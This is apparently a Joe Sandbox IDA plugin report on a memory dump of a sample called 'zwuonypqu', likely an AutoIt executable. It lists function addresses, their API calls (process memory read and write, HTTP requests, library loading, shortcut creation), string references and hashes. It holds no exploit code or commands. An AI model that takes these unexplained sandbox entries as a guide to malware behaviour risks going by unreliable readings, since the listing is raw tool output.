                        • API String ID: 2625713937-0
                        • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                        • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                        • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                        • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                        APIs
                          • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                        • ___set_flsgetvalue.LIBCMT ref: 004140E1
                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                        • ___fls_getvalue@4.LIBCMT ref: 004140EC
                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                        • ___fls_setvalue@8.LIBCMT ref: 004140FF
                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                        • ExitThread.KERNEL32 ref: 0041410F
                        • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00414115
                        • __freefls@4.LIBCMT ref: 00414135
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                        • String ID:
                        • API String ID: 132634196-0
                        • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                        • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                        • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                        • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                        APIs
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                          • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                        • __getptd_noexit.LIBCMT ref: 00415620
                        • CloseHandle.KERNEL32(?), ref: 00415634
                        • __freeptd.LIBCMT ref: 0041563B
                        • ExitThread.KERNEL32 ref: 00415643
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                        • String ID:
                        • API String ID: 3798957060-0
                        • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                        • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                        • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                        • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                        APIs
                          • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                        • ___set_flsgetvalue.LIBCMT ref: 00415690
                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                        • ___fls_getvalue@4.LIBCMT ref: 0041569B
                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                        • ___fls_setvalue@8.LIBCMT ref: 004156AD
                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                        • ExitThread.KERNEL32 ref: 004156BD
                        • __freefls@4.LIBCMT ref: 004156D9
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                        • String ID:
                        • API String ID: 1537469427-0
                        • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                        • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                        • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                        • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _malloc
                        • String ID: Default$|k
                        • API String ID: 1579825452-2254895183
                        • Opcode ID: 6619ce41559e0e7fe749d9952c926fcb34374a73fcc39ba98f74df42268f2eef
                        • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                        • Opcode Fuzzy Hash: 6619ce41559e0e7fe749d9952c926fcb34374a73fcc39ba98f74df42268f2eef
                        • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                        APIs
                          • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                        • CoInitialize.OLE32(00000000), ref: 0046CE18
                        • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                        • CoUninitialize.OLE32 ref: 0046CE50
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                        • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                        • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                        • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 176396367-557222456
                        • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                        • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                        • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                        • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                        APIs
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                        • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                        • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                        • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Variant$ClearCopyInit_malloc
                        • String ID: 4RH
                        • API String ID: 2981388473-749298218
                        • Opcode ID: de2a34c839e80a49e846fbfae4a17bbae5474b9d322bf5bd57eaf90000e3a1b6
                        • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                        • Opcode Fuzzy Hash: de2a34c839e80a49e846fbfae4a17bbae5474b9d322bf5bd57eaf90000e3a1b6
                        • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                        APIs
                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                        • __wcsnicmp.LIBCMT ref: 0046681A
                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                        • String ID: LPT$HH
                        • API String ID: 3035604524-2728063697
                        • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                        • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                        • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                        • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                        APIs
                          • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32 ref: 004374E2
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                          • Part of subcall function 00437472: ReadProcessMemory.KERNEL32 ref: 004374A5
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$MemoryProcess$ReadWrite
                        • String ID: @
                        • API String ID: 4055202900-2766056989
                        • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                        • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                        • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                        • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CrackInternet_memset_wcslen
                        • String ID: |
                        • API String ID: 915713708-2343686810
                        • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                        • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                        • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                        • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                        • HttpQueryInfoW.WININET ref: 0044A892
                          • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 3705125965-3916222277
                        • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                        • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                        • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                        • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                        • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                        • SetWindowLongW.USER32(00000000,000000F0,00000000,?,000000F0), ref: 00450AB3
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                        • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                        • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                        • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                        • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: AU3_GetPluginDetails
                        • API String ID: 145871493-4132174516
                        • Opcode ID: 7eed321260bd8f5d71dbe510d91ac59b9f75d1dc1561b7b75c4a2f1bff7ccae9
                        • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                        • Opcode Fuzzy Hash: 7eed321260bd8f5d71dbe510d91ac59b9f75d1dc1561b7b75c4a2f1bff7ccae9
                        • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 3375834691-2298589950
                        • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                        • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                        • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                        • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                        • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                        • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 0045125D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                        • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                        • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                        • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                        • GetVolumeInformationW.KERNEL32 ref: 0045D2C7
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: HH
                        • API String ID: 2507767853-2761332787
                        • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                        • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                        • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                        • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                        • GetVolumeInformationW.KERNEL32 ref: 0045D4CE
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: HH
                        • API String ID: 2507767853-2761332787
                        • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                        • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                        • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                        • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                        APIs
